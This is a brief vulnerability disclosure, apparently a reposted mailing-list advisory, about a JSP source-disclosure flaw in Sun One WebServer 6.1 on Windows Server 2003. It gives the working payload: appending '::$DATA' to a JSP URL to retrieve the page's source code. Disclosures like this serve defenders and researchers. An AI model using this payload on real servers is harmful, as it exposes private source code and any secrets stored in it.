Sun One WebServer 6.1 JSP Source Viewing vulnerability

fuchou-angle

Sun One WebServer 6.1 JSP Source Viewing vulnerability
Web安全手册 #Trace: JSP源代码泄露0day
From:    Kingcope Kingcope <kcope2_(at)_googlemail.com>
Sun One WebServer 6.1 JSP Source Viewing vulnerability
System: Sun-ONE-Web-Server/6.1, Windows Server 2003
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
JSP Source code.
A normal URL would look like:
http://server/hello.jsp
To disclose the contents including source code of a JSP file:
http://server/hello.jsp::$DATA
Best Regards,
Nikolaos Rangos